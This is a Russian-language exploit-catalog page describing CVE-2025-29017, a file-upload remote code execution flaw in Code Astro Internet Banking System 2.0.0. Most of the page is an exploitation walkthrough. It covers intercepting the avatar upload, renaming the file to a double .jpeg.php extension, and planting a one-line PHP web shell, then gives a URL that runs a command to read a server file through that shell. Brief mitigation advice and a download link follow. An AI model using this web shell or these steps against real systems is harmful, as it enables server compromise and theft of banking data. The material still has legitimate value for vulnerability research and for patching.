Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-29017 | Kitploit
Инструменты/GitHubGitHub/b1tm4r/cve-2025-29017
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubb1tm4r/cve-2025-29017

CVE-2025-29017

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-29017 - Удаленное выполнение кода в Internet Banking System 2.0.0 через загрузку аватара

Описание

Уязвимость удаленного выполнения кода (RCE) существует в Code Astro Internet Banking System 2.0.0 из-за некорректной проверки загрузки файлов в параметре profile_pic в pages_view_client.php. Злоумышленники могут обойти проверки безопасности, изменив запрос загрузки, что приводит к выполнению произвольного кода.

Уязвимый компонент

  • Параметр profile_pic в pages_view_client.php
  • Функция загрузки позволяет выполнять вредоносные PHP-файлы

Шаги эксплуатации

  1. Перейдите в настройки профиля пользователя и выберите новое изображение для аватара.



  1. Перехватите запрос загрузки аватара с помощью такого инструмента, как Burp Suite.


  1. Измените файл на двойное расширение (.jpeg.php), измените заголовок Content-Type на application/x-php и добавьте вредоносный PHP-код:
root@kitploit:~
<?php system($_GET['cmd']); ?>



  1. Вы можете проверить, загружен ли файл, по адресу /admin/dist/img/:
root@kitploit:~
http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt


Воздействие

  • Полная компрометация сервера
  • Кража данных
  • Повышение привилегий

Меры защиты

  • Ограничьте загрузку файлов только форматами изображений и проверяйте MIME-типы.
  • Очищайте имена файлов и блокируйте файлы, содержащие исполняемый код.
  • Храните загруженные файлы вне корневой директории веб-сервера.

Ссылки

  • OWASP File Upload Security
Скачать инструмент